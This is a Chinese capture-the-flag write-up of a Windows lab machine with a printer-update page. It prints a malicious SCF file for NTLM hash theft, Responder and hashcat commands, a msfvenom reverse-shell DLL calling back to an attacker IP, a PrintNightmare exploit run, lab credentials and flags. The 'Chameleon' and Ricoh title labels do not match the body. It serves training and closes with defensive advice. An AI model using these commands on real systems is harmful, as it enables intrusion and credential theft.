[Meachines] [Easy] Driver MFP Printer+SCF NTLM窃取+Chameleon ReShell+Ricoh v4.23权限提升
字数 1143 2025-08-22 12:23:36

MFP Printer漏洞利用与权限提升完整指南

1. 信息收集阶段

1.1 初始扫描

使用masscan进行快速端口扫描:

sudo masscan -p1-65535,U:1-65535 10.10.11.106 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports

提取并整理端口信息:

ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

使用nmap进行详细扫描:

nmap -Pn -sV -sC -p$ports 10.10.11.106

1.2 发现的服务

扫描结果:

  • 80/tcp: Microsoft IIS httpd 10.0
    • 需要Basic认证 (realm=MFP Firmware Update Center)
    • 存在TRACE方法
  • 135/tcp: Microsoft Windows RPC
  • 445/tcp: Microsoft Windows SMB (workgroup: WORKGROUP)
  • 5985/tcp: Microsoft HTTPAPI httpd 2.0 (WinRM)
  • 7680/tcp: filtered (pando-pub)

2. 初始访问

2.1 MFP打印机认证绕过

发现MFP打印机固件更新页面使用Basic认证:

  • 尝试默认凭证 admin:admin 成功

2.2 SCF文件NTLM中继攻击

创建恶意SCF文件:

[Shell]
Command=2
IconFile=\\10.10.16.28\share\test.ico
[Taskbar]
Command=ToggleDesktop

当用户访问包含此SCF文件的共享时,会尝试连接到攻击者的共享,泄露NTLM哈希。

使用Responder捕获哈希:

responder -I tun0

2.3 哈希破解

使用hashcat破解捕获的NTLMv2哈希:

hashcat -a 0 -m 5600 hashes /home/maptnh/Desktop/rockyou.txt

成功破解出密码:liltony

3. 获取初始立足点

使用破解的凭据通过WinRM登录:

evil-winrm -i 10.10.11.106 -u tony -p liltony

成功获取user flag:
f215191e19ff842c9ec213a1535a77fc

4. 权限提升

4.1 使用Chameleon工具

下载Chameleon工具:

Invoke-WebRequest -Uri 'http://10.10.16.28/winPEASx64.exe' -OutFile 'C:\\Users\\tony\\Documents\\winPEASx64.exe'

运行winPEAS进行信息收集:

.\winPEASx64.exe

4.2 创建恶意DLL

使用msfvenom生成反向shell DLL:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.28 lport=443 -f dll -o rev443.dll

上传DLL到目标:

upload rev443.dll

4.3 利用CVE-2021-1675 (PrintNightmare)

使用公开的漏洞利用脚本:

python3 CVE-2021-1675.py tony:liltony@10.10.11.106 'C:\Users\tony\Documents\rev443.dll'

4.4 设置Metasploit监听器

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run

成功获取system权限,读取root flag:
92afbf0a78443ef4b9851b31ec520a29

5. 关键点总结

  1. 默认凭证检查:总是尝试常见设备的默认凭证
  2. NTLM中继攻击:SCF文件是有效的攻击向量
  3. WinRM利用:破解的凭证可以通过WinRM快速获取访问
  4. PrintNightmare漏洞:CVE-2021-1675是有效的本地权限提升方法
  5. 自动化工具:winPEAS和Chameleon可以加速信息收集过程

6. 防御建议

  1. 更改所有默认凭证
  2. 禁用不必要的协议和服务(如SMBv1)
  3. 实施SMB签名要求
  4. 及时安装Windows更新,特别是PrintNightmare补丁
  5. 限制网络共享的访问权限
  6. 监控异常的网络认证尝试
MFP Printer漏洞利用与权限提升完整指南 1. 信息收集阶段 1.1 初始扫描 使用masscan进行快速端口扫描: 提取并整理端口信息: 使用nmap进行详细扫描: 1.2 发现的服务 扫描结果: 80/tcp: Microsoft IIS httpd 10.0 需要Basic认证 (realm=MFP Firmware Update Center) 存在TRACE方法 135/tcp: Microsoft Windows RPC 445/tcp: Microsoft Windows SMB (workgroup: WORKGROUP) 5985/tcp: Microsoft HTTPAPI httpd 2.0 (WinRM) 7680/tcp: filtered (pando-pub) 2. 初始访问 2.1 MFP打印机认证绕过 发现MFP打印机固件更新页面使用Basic认证: 尝试默认凭证 admin:admin 成功 2.2 SCF文件NTLM中继攻击 创建恶意SCF文件: 当用户访问包含此SCF文件的共享时,会尝试连接到攻击者的共享,泄露NTLM哈希。 使用Responder捕获哈希: 2.3 哈希破解 使用hashcat破解捕获的NTLMv2哈希: 成功破解出密码: liltony 3. 获取初始立足点 使用破解的凭据通过WinRM登录: 成功获取user flag: f215191e19ff842c9ec213a1535a77fc 4. 权限提升 4.1 使用Chameleon工具 下载Chameleon工具: 运行winPEAS进行信息收集: 4.2 创建恶意DLL 使用msfvenom生成反向shell DLL: 上传DLL到目标: 4.3 利用CVE-2021-1675 (PrintNightmare) 使用公开的漏洞利用脚本: 4.4 设置Metasploit监听器 成功获取system权限,读取root flag: 92afbf0a78443ef4b9851b31ec520a29 5. 关键点总结 默认凭证检查 :总是尝试常见设备的默认凭证 NTLM中继攻击 :SCF文件是有效的攻击向量 WinRM利用 :破解的凭证可以通过WinRM快速获取访问 PrintNightmare漏洞 :CVE-2021-1675是有效的本地权限提升方法 自动化工具 :winPEAS和Chameleon可以加速信息收集过程 6. 防御建议 更改所有默认凭证 禁用不必要的协议和服务(如SMBv1) 实施SMB签名要求 及时安装Windows更新,特别是PrintNightmare补丁 限制网络共享的访问权限 监控异常的网络认证尝试